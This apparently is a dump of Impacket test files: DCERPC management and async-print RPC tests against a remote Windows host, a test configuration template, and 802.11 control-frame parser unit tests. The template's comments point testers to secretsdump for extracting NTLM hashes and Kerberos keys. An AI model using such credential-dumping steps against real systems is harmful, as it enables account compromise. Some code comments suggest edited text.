        """The stop request must be rejected with ``rpc_s_access_denied``."""
        dce, _ = self.connect()

        stop_req = mgmt.stop_server_listening()
        with assertRaisesRegex(self, DCERPCException, "rpc_s_access_denied"):
            dce.request(stop_req)

    def test_hstop_server_listening(self):
        """The helper must be rejected with ``rpc_s_access_denied`` as well."""
        dce, _ = self.connect()

        with assertRaisesRegex(self, DCERPCException, "rpc_s_access_denied"):
            mgmt.hstop_server_listening(dce)

    def test_inq_princ_name(self):
        """Ask for the principal name with error checking off."""
        dce, _ = self.connect()

        name_req = mgmt.inq_princ_name()
        name_req['authn_proto'] = 0
        name_req['princ_name_size'] = 32
        reply = dce.request(name_req, checkError=False)
        reply.dump()

    def test_hinq_princ_name(self):
        """Same call through the helper."""
        dce, _ = self.connect()

        reply = mgmt.hinq_princ_name(dce)
        reply.dump()
102 |
103 |
@pytest.mark.remote
class MGMTTestsSMBTransport(MGMTTests, unittest.TestCase):
    """MGMT tests on the inherited named-pipe binding with the NDR transfer syntax."""

    transfer_syntax = DCERPCTests.TRANSFER_SYNTAX_NDR
107 |
108 |
@pytest.mark.remote
class MGMTTestsSMBTransport64(MGMTTests, unittest.TestCase):
    """MGMT tests on the inherited named-pipe binding with the NDR64 transfer syntax."""

    transfer_syntax = DCERPCTests.TRANSFER_SYNTAX_NDR64
112 |
113 |
@pytest.mark.remote
class MGMTTestsTCPTransport(MGMTTests, unittest.TestCase):
    """MGMT tests over ``ncacn_ip_tcp`` on port 135 with the NDR transfer syntax."""

    string_binding = r"ncacn_ip_tcp:{0.machine}[135]"
    transfer_syntax = DCERPCTests.TRANSFER_SYNTAX_NDR
118 |
119 |
@pytest.mark.remote
class MGMTTestsTCPTransport64(MGMTTests, unittest.TestCase):
    """MGMT tests over ``ncacn_ip_tcp`` on port 135 with the NDR64 transfer syntax."""

    transfer_syntax = DCERPCTests.TRANSFER_SYNTAX_NDR64
    string_binding = r"ncacn_ip_tcp:{0.machine}[135]"
124 |
125 |
126 | # Process command-line arguments.
127 | if __name__ == "__main__":
128 | unittest.main(verbosity=1)
129 |
--------------------------------------------------------------------------------
/impacket/tests/dcerpc/test_par.py:
--------------------------------------------------------------------------------
1 | # Impacket - Collection of Python classes for working with network protocols.
2 | #
3 | # Copyright (C) 2023 Fortra. All rights reserved.
4 | #
5 | # This software is provided under a slightly modified version
6 | # of the Apache Software License. See the accompanying LICENSE file
7 | # for more information.
8 | #
9 | # Tested so far:
10 | # (h)RpcAsyncEnumPrinters
11 | # (h)RpcAsyncEnumPrinterDrivers
12 | # (h)RpcAsyncGetPrinterDriverDirectory
13 | #
14 | # Not yet:
15 | # (h)RpcAsyncOpenPrinter
16 | # (h)RpcAsyncClosePrinter
17 | # (h)RpcAsyncAddPrinterDriver
18 | # RpcAsyncAddPrinter
19 | #
20 | import pytest
21 | import unittest
22 | from six import assertRaisesRegex
23 | from tests.dcerpc import DCERPCTests
24 |
25 | from impacket.dcerpc.v5 import par
26 | from impacket.dcerpc.v5.dtypes import NULL
27 | from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY
28 |
29 |
class PARTests(DCERPCTests):
    """Tests for the asynchronous print interface (``par``).

    Requests go out over an authenticated connection at
    ``RPC_C_AUTHN_LEVEL_PKT_PRIVACY``. The two hand-built requests that pass a
    zero-sized buffer must fail with ``ERROR_INSUFFICIENT_BUFFER``. The other
    tests only check that the call completes.
    """
    iface_uuid = par.MSRPC_UUID_PAR
    string_binding_formatting = DCERPCTests.STRING_BINDING_MAPPER
    authn = True
    authn_level = RPC_C_AUTHN_LEVEL_PKT_PRIVACY

    def test_RpcAsyncEnumPrinters(self):
        """Enumerate printers with every input left at zero or NULL."""
        dce, _ = self.connect()
        enum_req = par.RpcAsyncEnumPrinters()
        for field, value in (('Flags', 0), ('Name', NULL), ('pPrinterEnum', NULL), ('Level', 0)):
            enum_req[field] = value
        reply = dce.request(enum_req, par.MSRPC_UUID_WINSPOOL)
        reply.dump()

    def test_hRpcAsyncEnumPrinters(self):
        """Same call through the helper."""
        dce, _ = self.connect()
        reply = par.hRpcAsyncEnumPrinters(dce, NULL)
        reply.dump()

    def test_RpcAsyncEnumPrinterDrivers(self):
        """A zero-sized buffer must be answered with ``ERROR_INSUFFICIENT_BUFFER``."""
        dce, _ = self.connect()
        drivers_req = par.RpcAsyncEnumPrinterDrivers()
        for field, value in (('pName', NULL), ('pEnvironment', NULL), ('Level', 1),
                             ('pDrivers', NULL), ('cbBuf', 0)):
            drivers_req[field] = value
        with assertRaisesRegex(self, par.DCERPCException, "ERROR_INSUFFICIENT_BUFFER"):
            dce.request(drivers_req, par.MSRPC_UUID_WINSPOOL)

    def test_hRpcAsyncEnumPrinterDrivers(self):
        """Enumerate drivers at level 1 through the helper."""
        dce, _ = self.connect()
        reply = par.hRpcAsyncEnumPrinterDrivers(dce, NULL, NULL, 1)
        reply.dump()

    def test_RpcAsyncGetPrinterDriverDirectory(self):
        """A zero-sized buffer must be answered with ``ERROR_INSUFFICIENT_BUFFER``."""
        dce, _ = self.connect()
        dir_req = par.RpcAsyncGetPrinterDriverDirectory()
        for field, value in (('pName', NULL), ('pEnvironment', NULL), ('Level', 1),
                             ('pDriverDirectory', NULL), ('cbBuf', 0)):
            dir_req[field] = value
        with assertRaisesRegex(self, par.DCERPCException, "ERROR_INSUFFICIENT_BUFFER"):
            dce.request(dir_req, par.MSRPC_UUID_WINSPOOL)

    def test_hRpcAsyncGetPrinterDriverDirectory(self):
        """Fetch the driver directory at level 1 through the helper."""
        dce, _ = self.connect()
        reply = par.hRpcAsyncGetPrinterDriverDirectory(dce, NULL, NULL, 1)
        reply.dump()
82 |
83 |
@pytest.mark.remote
class PARTestsTCPTransport(PARTests, unittest.TestCase):
    """PAR tests over ``ncacn_ip_tcp`` with the NDR transfer syntax."""

    transfer_syntax = DCERPCTests.TRANSFER_SYNTAX_NDR
    protocol = "ncacn_ip_tcp"
88 |
89 |
@pytest.mark.remote
class PARTestsTCPTransport64(PARTests, unittest.TestCase):
    """PAR tests over ``ncacn_ip_tcp`` with the NDR64 transfer syntax."""

    transfer_syntax = DCERPCTests.TRANSFER_SYNTAX_NDR64
    protocol = "ncacn_ip_tcp"
94 |
95 |
96 | # Process command-line arguments.
97 | if __name__ == "__main__":
98 | unittest.main(verbosity=1)
99 |
--------------------------------------------------------------------------------
/impacket/tests/dcetests.cfg.template:
--------------------------------------------------------------------------------
1 | [global]
2 |
3 | [TCPTransport]
4 | # NetBIOS Name
5 | servername =
6 | # Target's IP address
7 | machine =
8 | username =
9 | password =
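10 | # NTLM hash of the test account (you can grab it with secretsdump); a hash is password-equivalent, so keep the filled-in copy of this file out of version control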
11 | hashes =
12 | # Kerberos AES 256 Key, you can grab it with secretsdump
13 | aesKey256 =
14 | # Kerberos AES 128 Key, you can grab it with secretsdump
15 | aesKey128 =
16 | # It must be the domain FQDN
17 | domain =
18 | # This needs to be the NetBIOS name of a domain-joined machine
19 | machineuser =
20 | # Domain joined machine NetBIOS name hashes (grab them with secretsdump)
21 | machineuserhashes =
22 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Copyright (C) 2023 Fortra. All rights reserved.
3 | #
4 | # This software is provided under a slightly modified version
5 | # of the Apache Software License. See the accompanying LICENSE file
6 | # for more information.
7 | #
8 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_Dot11Base.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from impacket.dot11 import Dot11, Dot11Types
12 |
13 |
class TestDot11Common(unittest.TestCase):
    """Getter/setter tests for the fields of the 802.11 frame control header."""

    def setUp(self):
        # Frame control field
        raw_frame = b'\xd4\x00\x00\x00\x00\x08\x54\xac\x2f\x85\xb7\x7f\xc3\x9e'
        self.dot11fc = Dot11(raw_frame)

    def _check_field(self, getter, setter, initial, updated):
        """Assert the parsed value, write a new one, and assert it reads back."""
        self.assertEqual(getter(), initial)
        setter(updated)
        self.assertEqual(getter(), updated)

    def test_01_HeaderSize(self):
        """Test Header Size field"""
        self.assertEqual(self.dot11fc.get_header_size(), 2)

    def test_01_TailSize(self):
        """Test Tail Size field"""
        self.assertEqual(self.dot11fc.get_tail_size(), 4)

    def test_02_Version(self):
        """Test Version field"""
        self._check_field(self.dot11fc.get_version, self.dot11fc.set_version, 0, 3)

    def test_03_Type(self):
        """Test Type field"""
        self._check_field(self.dot11fc.get_type, self.dot11fc.set_type, 1, 3)

    def test_04_SubType(self):
        """Test Subtype field"""
        self._check_field(self.dot11fc.get_subtype, self.dot11fc.set_subtype, 13, 5)

    def test_05_ToDS(self):
        """Test toDS field"""
        self._check_field(self.dot11fc.get_toDS, self.dot11fc.set_toDS, 0, 1)

    def test_06_FromDS(self):
        """Test fromDS field"""
        self._check_field(self.dot11fc.get_fromDS, self.dot11fc.set_fromDS, 0, 1)

    def test_07_MoreFrag(self):
        """Test More Frag field"""
        self._check_field(self.dot11fc.get_moreFrag, self.dot11fc.set_moreFrag, 0, 1)

    def test_08_Retry(self):
        """Test Retry field"""
        self._check_field(self.dot11fc.get_retry, self.dot11fc.set_retry, 0, 1)

    def test_09_PowerManagement(self):
        """Test Power Management field"""
        self._check_field(self.dot11fc.get_powerManagement, self.dot11fc.set_powerManagement, 0, 1)

    def test_10_MoreData(self):
        """Test More Data field"""
        self._check_field(self.dot11fc.get_moreData, self.dot11fc.set_moreData, 0, 1)

    # Disabled test kept for reference:
    # def test_11_WEP(self):
    #     'Test WEP field'
    #     self.assertEqual(self.dot11fc.get_WEP(),0)
    #     self.dot11fc.set_WEP(1)
    #     self.assertEqual(self.dot11fc.get_WEP(),1)

    def test_12_Order(self):
        """Test Order field"""
        self._check_field(self.dot11fc.get_order, self.dot11fc.set_order, 0, 1)

    def test_13_latest(self):
        """Test complete frame hexs"""
        header = self.dot11fc
        header.set_type_n_subtype(Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_POWERSAVE_POLL)
        header.set_order(1)
        header.set_moreData(1)
        header.set_retry(1)
        header.set_fromDS(1)

        # Only the first two bytes (the frame control field) differ from the input.
        expected = b'\xa4\xaa\x00\x00\x00\x08\x54\xac\x2f\x85\xb7\x7f\xc3\x9e'
        self.assertEqual(header.get_packet(), expected)
107 |
108 |
109 | if __name__ == '__main__':
110 | unittest.main(verbosity=1)
111 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_Dot11Decoder.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from six import PY2
12 | from impacket.ImpactDecoder import Dot11Decoder #,Dot11Types
13 |
14 |
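class TestDot11Decoder(unittest.TestCase):
    """Checks the chain of layer objects that Dot11Decoder builds for a WEP frame.

    No WEP key is configured, so only the layers down to the opaque payload
    are checked; the branches that need a key are present but never run.
    """

    def setUp(self):
        self.WEPKey=None #Unknown
        self.WEPData=b'\x08\x41\x3a\x01\x00\x17\x3f\x44\x4f\x96\x00\x13\xce\x67\x0e\x73\x00\x17\x3f\x44\x4f\x96\xb0\x04\xeb\xcd\x8b\x00\x6e\xdf\x93\x36\x39\x5a\x39\x66\x6b\x96\xd1\x7a\xe1\xae\xb6\x11\x22\xfd\xf0\xd4\x0d\x6a\xb8\xb1\xe6\x2e\x1f\x25\x7d\x64\x1a\x07\xd5\x86\xd2\x19\x34\xb5\xf7\x8a\x62\x33\x59\x6e\x89\x01\x73\x50\x12\xbb\xde\x17\xdd\xb5\xd4\x35'
        dot11_decoder = Dot11Decoder()
        # in0..in3 are the successive child layers of the decoded frame.
        self.in0=dot11_decoder.decode(self.WEPData)
        self.in1=self.in0.child()
        self.in2=self.in1.child()
        self.in3=self.in2.child()
        if self.WEPKey:
            self.in4=self.in3.child()
            self.in5=self.in4.child()

    @staticmethod
    def _class_repr(qualified_name):
        """Return what ``str(cls)`` yields for ``qualified_name`` on this interpreter.

        The Python 2 branch keeps the bare dotted name these tests always
        expected there. Python 3 renders a class as ``<class 'module.Name'>``,
        so comparing against an empty string, as the page showed, can never pass.
        """
        if PY2:
            return qualified_name
        return "<class '%s'>" % qualified_name

    def test_01_Dot11Decoder(self):
        'Test Dot11 decoder'
        self.assertEqual(str(self.in0.__class__), self._class_repr("impacket.dot11.Dot11"))

    def test_02_Dot11DataFrameDecoder(self):
        'Test Dot11DataFrame decoder'
        self.assertEqual(str(self.in1.__class__), self._class_repr("impacket.dot11.Dot11DataFrame"))

    def test_03_Dot11WEP(self):
        'Test Dot11WEP decoder'
        self.assertEqual(str(self.in2.__class__), self._class_repr("impacket.dot11.Dot11WEP"))

    def test_04_Dot11WEPData(self):
        'Test Dot11WEPData decoder'

        # Without a key the payload is not decoded as WEP data; nothing to check.
        if not self.WEPKey:
            return

        self.assertEqual(str(self.in3.__class__), self._class_repr("impacket.dot11.Dot11WEPData"))

        # Test if wep data "get_packet" is correct
        wepdata=b'\x6e\xdf\x93\x36\x39\x5a\x39\x66\x6b\x96\xd1\x7a\xe1\xae\xb6\x11\x22\xfd\xf0\xd4\x0d\x6a\xb8\xb1\xe6\x2e\x1f\x25\x7d\x64\x1a\x07\xd5\x86\xd2\x19\x34\xb5\xf7\x8a\x62\x33\x59\x6e\x89\x01\x73\x50\x12\xbb\xde\x17'
        self.assertEqual(self.in3.get_packet(), wepdata)

    def test_05_LLC(self):
        'Test LLC decoder'
        if self.WEPKey:
            self.assertEqual(str(self.in4.__class__), self._class_repr("impacket.dot11.LLC"))

    def test_06_Data(self):
        'Test LLC Data decoder'

        if self.WEPKey:
            dataclass=self.in4.__class__
        else:
            dataclass=self.in3.__class__

        self.assertGreater(str(dataclass).find('ImpactPacket.Data'), 0)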
76 |
77 |
78 | if __name__ == '__main__':
79 | unittest.main(verbosity=1)
80 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_FrameControlACK.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from impacket.dot11 import Dot11,Dot11Types,Dot11ControlFrameACK
12 |
13 |
class TestDot11FrameControlACK(unittest.TestCase):
    """Field tests for an 802.11 ACK control frame."""

    def setUp(self):
        # 802.11 Control Frame ACK
        self.frame_orig = b'\xd4\x00\x00\x00\x00\x08\x54\xac\x2f\x85\xb7\x7f\xc3\x9e'

        outer = Dot11(self.frame_orig)

        # The fixture must decode as a control frame of subtype ACK before
        # its body is handed to the ACK class.
        self.assertEqual(outer.get_type(), Dot11Types.DOT11_TYPE_CONTROL)
        self.assertEqual(outer.get_subtype(), Dot11Types.DOT11_SUBTYPE_CONTROL_ACKNOWLEDGMENT)
        self.assertEqual(outer.get_type_n_subtype(), Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_ACKNOWLEDGMENT)

        self.ack = Dot11ControlFrameACK(outer.get_body_as_string())

        outer.contains(self.ack)

    def test_01_HeaderTailSize(self):
        """Test Header and Tail Size field"""
        self.assertEqual(self.ack.get_header_size(), 8)
        self.assertEqual(self.ack.get_tail_size(), 0)

    def test_02_Duration(self):
        """Test Duration field"""
        frame = self.ack
        self.assertEqual(frame.get_duration(), 0)
        frame.set_duration(0x1234)
        self.assertEqual(frame.get_duration(), 0x1234)

    def test_03_RA(self):
        """Test RA field"""
        frame = self.ack
        address = frame.get_ra()
        self.assertEqual(address.tolist(), [0x00, 0x08, 0x54, 0xac, 0x2f, 0x85])
        # Overwrite the first and last octet and check both survive a set/get.
        address[0], address[5] = 0x12, 0x34
        frame.set_ra(address)
        self.assertEqual(frame.get_ra().tolist(), [0x12, 0x08, 0x54, 0xac, 0x2f, 0x34])
56 |
57 |
58 | if __name__ == '__main__':
59 | unittest.main(verbosity=1)
60 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_FrameControlCFEnd.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from impacket.dot11 import Dot11,Dot11Types,Dot11ControlFrameCFEnd
12 |
13 |
class TestDot11FrameControlCFEnd(unittest.TestCase):
    """Getter/setter checks for an 802.11 CF-End control frame."""

    def setUp(self):
        # 802.11 Control Frame CFEnd
        self.frame_orig = b'\xe4\x00\x00\x00\xff\xff\xff\xff\xff\xff\x00\x19\xe0\x98\x04\xd4\xad\x9c\x3c\xc0'

        frame = Dot11(self.frame_orig)

        # Confirm the outer header is recognised as control / CF-End first.
        self.assertEqual(frame.get_type(), Dot11Types.DOT11_TYPE_CONTROL)
        self.assertEqual(frame.get_subtype(), Dot11Types.DOT11_SUBTYPE_CONTROL_CF_END)
        self.assertEqual(frame.get_type_n_subtype(), Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_CF_END)

        self.cfend = Dot11ControlFrameCFEnd(frame.get_body_as_string())
        frame.contains(self.cfend)

    def test_01_HeaderTailSize(self):
        'Test Header and Tail Size field'
        header_len = self.cfend.get_header_size()
        self.assertEqual(header_len, 14)
        tail_len = self.cfend.get_tail_size()
        self.assertEqual(tail_len, 0)

    def test_02_Duration(self):
        'Test Duration field'
        replacement = 0x1234

        self.assertEqual(self.cfend.get_duration(), 0x00)
        self.cfend.set_duration(replacement)
        self.assertEqual(self.cfend.get_duration(), replacement)

    def test_03_RA(self):
        'Test RA field'
        # The capture is addressed to the all-ones (broadcast) address.
        receiver = self.cfend.get_ra()
        self.assertEqual(receiver.tolist(), [0xff] * 6)

        receiver[0], receiver[5] = 0x12, 0x34
        self.cfend.set_ra(receiver)
        self.assertEqual(self.cfend.get_ra().tolist(), [0x12, 0xff, 0xff, 0xff, 0xff, 0x34])

    def test_04_BSSID(self):
        'Test BSS ID field'
        captured = [0x00, 0x19, 0xe0, 0x98, 0x04, 0xd4]

        station_set = self.cfend.get_bssid()
        self.assertEqual(station_set.tolist(), captured)

        # Only the outer octets change; the middle four must survive the round trip.
        station_set[0], station_set[5] = 0x12, 0x34
        self.cfend.set_bssid(station_set)
        self.assertEqual(self.cfend.get_bssid().tolist(), [0x12] + captured[1:5] + [0x34])


if __name__ == '__main__':
    unittest.main(verbosity=1)
70 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_FrameControlCFEndCFACK.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from impacket.dot11 import Dot11,Dot11Types,Dot11ControlFrameCFEndCFACK
12 |
13 |
class TestDot11FrameControlCFEndCFACK(unittest.TestCase):
    """Getter/setter checks for an 802.11 CF-End + CF-ACK control frame."""

    def setUp(self):
        # 802.11 Control Frame CFEndCFACK
        self.frame_orig = b'\xf4\x74\xde\xed\xe5\x56\x85\xf8\xd2\x3b\x96\xae\x0f\xb0\xd9\x8a\x03\x02\x38\x00'

        frame = Dot11(self.frame_orig)

        self.assertEqual(frame.get_type(), Dot11Types.DOT11_TYPE_CONTROL)
        self.assertEqual(frame.get_subtype(), Dot11Types.DOT11_SUBTYPE_CONTROL_CF_END_CF_ACK)
        self.assertEqual(frame.get_type_n_subtype(), Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_CF_END_CF_ACK)

        self.cfendcfack = Dot11ControlFrameCFEndCFACK(frame.get_body_as_string())
        frame.contains(self.cfendcfack)

    def test_01_HeaderTailSize(self):
        'Test Header and Tail Size field'
        header_len = self.cfendcfack.get_header_size()
        self.assertEqual(header_len, 14)
        tail_len = self.cfendcfack.get_tail_size()
        self.assertEqual(tail_len, 0)

    def test_02_Duration(self):
        'Test Duration field'
        # Bytes 0xde 0xed in the capture read back as 0xEDDE (little-endian).
        self.assertEqual(self.cfendcfack.get_duration(), 0xEDDE)

        replacement = 0x1234
        self.cfendcfack.set_duration(replacement)
        self.assertEqual(self.cfendcfack.get_duration(), replacement)

    def test_03_RA(self):
        'Test RA field'
        captured = [0xe5, 0x56, 0x85, 0xf8, 0xd2, 0x3b]

        receiver = self.cfendcfack.get_ra()
        self.assertEqual(receiver.tolist(), captured)

        receiver[0], receiver[5] = 0x12, 0x34
        self.cfendcfack.set_ra(receiver)
        self.assertEqual(self.cfendcfack.get_ra().tolist(), [0x12] + captured[1:5] + [0x34])

    def test_04_BSSID(self):
        'Test BSS ID field'
        captured = [0x96, 0xae, 0x0f, 0xb0, 0xd9, 0x8a]

        station_set = self.cfendcfack.get_bssid()
        self.assertEqual(station_set.tolist(), captured)

        station_set[0], station_set[5] = 0x12, 0x34
        self.cfendcfack.set_bssid(station_set)
        self.assertEqual(self.cfendcfack.get_bssid().tolist(), [0x12] + captured[1:5] + [0x34])


if __name__ == '__main__':
    unittest.main(verbosity=1)
70 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_FrameControlCTS.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from impacket.dot11 import Dot11,Dot11Types,Dot11ControlFrameCTS
12 |
13 |
class TestDot11FrameControlCTS(unittest.TestCase):
    """Getter/setter checks for an 802.11 CTS (clear-to-send) control frame."""

    def setUp(self):
        # 802.11 Control Frame CTS
        self.frame_orig = b'\xc4\x00\x3b\x12\x00\x19\xe0\x98\x04\xd4\x2b\x8a\x65\x17'

        frame = Dot11(self.frame_orig)

        self.assertEqual(frame.get_type(), Dot11Types.DOT11_TYPE_CONTROL)
        self.assertEqual(frame.get_subtype(), Dot11Types.DOT11_SUBTYPE_CONTROL_CLEAR_TO_SEND)
        self.assertEqual(frame.get_type_n_subtype(), Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_CLEAR_TO_SEND)

        self.cts = Dot11ControlFrameCTS(frame.get_body_as_string())
        frame.contains(self.cts)

    def test_01_HeaderTailSize(self):
        'Test Header and Tail Size field'
        sizes = (self.cts.get_header_size(), self.cts.get_tail_size())
        self.assertEqual(sizes[0], 8)
        self.assertEqual(sizes[1], 0)

    def test_02_Duration(self):
        'Test Duration field'
        # 4667 == 0x123b: capture bytes 0x3b 0x12 read little-endian.
        self.assertEqual(self.cts.get_duration(), 4667)

        replacement = 0x1234
        self.cts.set_duration(replacement)
        self.assertEqual(self.cts.get_duration(), replacement)

    def test_03_RA(self):
        'Test RA field'
        captured = [0x00, 0x19, 0xe0, 0x98, 0x04, 0xd4]

        receiver = self.cts.get_ra()
        self.assertEqual(receiver.tolist(), captured)

        receiver[0], receiver[5] = 0x12, 0x34
        self.cts.set_ra(receiver)
        self.assertEqual(self.cts.get_ra().tolist(), [0x12] + captured[1:5] + [0x34])


if __name__ == '__main__':
    unittest.main(verbosity=1)
61 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_FrameControlPSPoll.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from impacket.dot11 import Dot11,Dot11Types,Dot11ControlFramePSPoll
12 |
13 |
class TestDot11FrameControlPSPoll(unittest.TestCase):
    """Getter/setter checks for an 802.11 PS-Poll control frame."""

    def setUp(self):
        # 802.11 Control Frame PSPoll
        self.frame_orig = b'\xa6\x73\xf1\xaf\x48\x06\xee\x23\x2b\xc9\xfe\xbe\xe5\x05\x4c\x0a\x04\xa0\x00\x0f'

        frame = Dot11(self.frame_orig)

        self.assertEqual(frame.get_type(), Dot11Types.DOT11_TYPE_CONTROL)
        self.assertEqual(frame.get_subtype(), Dot11Types.DOT11_SUBTYPE_CONTROL_POWERSAVE_POLL)
        self.assertEqual(frame.get_type_n_subtype(), Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_POWERSAVE_POLL)

        self.pspoll = Dot11ControlFramePSPoll(frame.get_body_as_string())
        frame.contains(self.pspoll)

    def test_01_HeaderTailSize(self):
        'Test Header and Tail Size field'
        header_len = self.pspoll.get_header_size()
        self.assertEqual(header_len, 14)
        tail_len = self.pspoll.get_tail_size()
        self.assertEqual(tail_len, 0)

    def test_02_AID(self):
        'Test AID field'
        # Capture bytes 0xf1 0xaf read back as 0xAFF1 (little-endian).
        self.assertEqual(self.pspoll.get_aid(), 0xAFF1)

        replacement = 0x1234
        self.pspoll.set_aid(replacement)
        self.assertEqual(self.pspoll.get_aid(), replacement)

    def test_03_BSSID(self):
        'Test BSS ID field'
        captured = [0x48, 0x06, 0xee, 0x23, 0x2b, 0xc9]

        station_set = self.pspoll.get_bssid()
        self.assertEqual(station_set.tolist(), captured)

        station_set[0], station_set[5] = 0x12, 0x34
        self.pspoll.set_bssid(station_set)
        self.assertEqual(self.pspoll.get_bssid().tolist(), [0x12] + captured[1:5] + [0x34])

    def test_04_TA(self):
        'Test TA field'
        captured = [0xfe, 0xbe, 0xe5, 0x05, 0x4c, 0x0a]

        transmitter = self.pspoll.get_ta()
        self.assertEqual(transmitter.tolist(), captured)

        transmitter[0], transmitter[5] = 0x12, 0x34
        self.pspoll.set_ta(transmitter)
        self.assertEqual(self.pspoll.get_ta().tolist(), [0x12] + captured[1:5] + [0x34])


if __name__ == '__main__':
    unittest.main(verbosity=1)
70 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_FrameControlRTS.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from impacket.dot11 import Dot11, Dot11Types, Dot11ControlFrameRTS
12 |
13 |
class TestDot11FrameControlRTS(unittest.TestCase):
    """Getter/setter checks for an 802.11 RTS (request-to-send) control frame."""

    def setUp(self):
        # 802.11 Control Frame RTS
        self.frame_orig = b'\xb4\x00\x81\x01\x00\x08\x54\xac\x2f\x85\x00\x23\x4d\x09\x86\xfe\x99\x75\x43\x73'

        frame = Dot11(self.frame_orig)

        self.assertEqual(frame.get_type(), Dot11Types.DOT11_TYPE_CONTROL)
        self.assertEqual(frame.get_subtype(), Dot11Types.DOT11_SUBTYPE_CONTROL_REQUEST_TO_SEND)
        self.assertEqual(frame.get_type_n_subtype(), Dot11Types.DOT11_TYPE_CONTROL_SUBTYPE_REQUEST_TO_SEND)

        self.rts = Dot11ControlFrameRTS(frame.get_body_as_string())
        frame.contains(self.rts)

    def test_01_HeaderTailSize(self):
        'Test Header and Tail Size field'
        header_len = self.rts.get_header_size()
        self.assertEqual(header_len, 14)
        tail_len = self.rts.get_tail_size()
        self.assertEqual(tail_len, 0)

    def test_02_Duration(self):
        'Test Duration field'
        # Capture bytes 0x81 0x01 read back as 0x181 (little-endian).
        self.assertEqual(self.rts.get_duration(), 0x181)

        replacement = 0x1234
        self.rts.set_duration(replacement)
        self.assertEqual(self.rts.get_duration(), replacement)

    def test_03_RA(self):
        'Test RA field'
        captured = [0x00, 0x08, 0x54, 0xac, 0x2f, 0x85]

        receiver = self.rts.get_ra()
        self.assertEqual(receiver.tolist(), captured)

        receiver[0], receiver[5] = 0x12, 0x34
        self.rts.set_ra(receiver)
        self.assertEqual(self.rts.get_ra().tolist(), [0x12] + captured[1:5] + [0x34])

    def test_04_TA(self):
        'Test TA field'
        captured = [0x00, 0x23, 0x4d, 0x09, 0x86, 0xfe]

        transmitter = self.rts.get_ta()
        self.assertEqual(transmitter.tolist(), captured)

        transmitter[0], transmitter[5] = 0x12, 0x34
        self.rts.set_ta(transmitter)
        self.assertEqual(self.rts.get_ta().tolist(), [0x12] + captured[1:5] + [0x34])


if __name__ == '__main__':
    unittest.main(verbosity=1)
70 |
--------------------------------------------------------------------------------
/impacket/tests/dot11/test_FrameData.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Impacket - Collection of Python classes for working with network protocols.
3 | #
4 | # Copyright (C) 2023 Fortra. All rights reserved.
5 | #
6 | # This software is provided under a slightly modified version
7 | # of the Apache Software License. See the accompanying LICENSE file
8 | # for more information.
9 | #
10 | import unittest
11 | from impacket.dot11 import Dot11, Dot11Types, Dot11DataFrame
12 |
13 |
class TestDot11DataFrames(unittest.TestCase):
    """Getter/setter checks for an 802.11 data frame with three addresses.

    The fixture is a single well-formed capture; short or malformed frames
    are not exercised by this class.
    """

    def setUp(self):
        # 802.11 Data Frame
        #
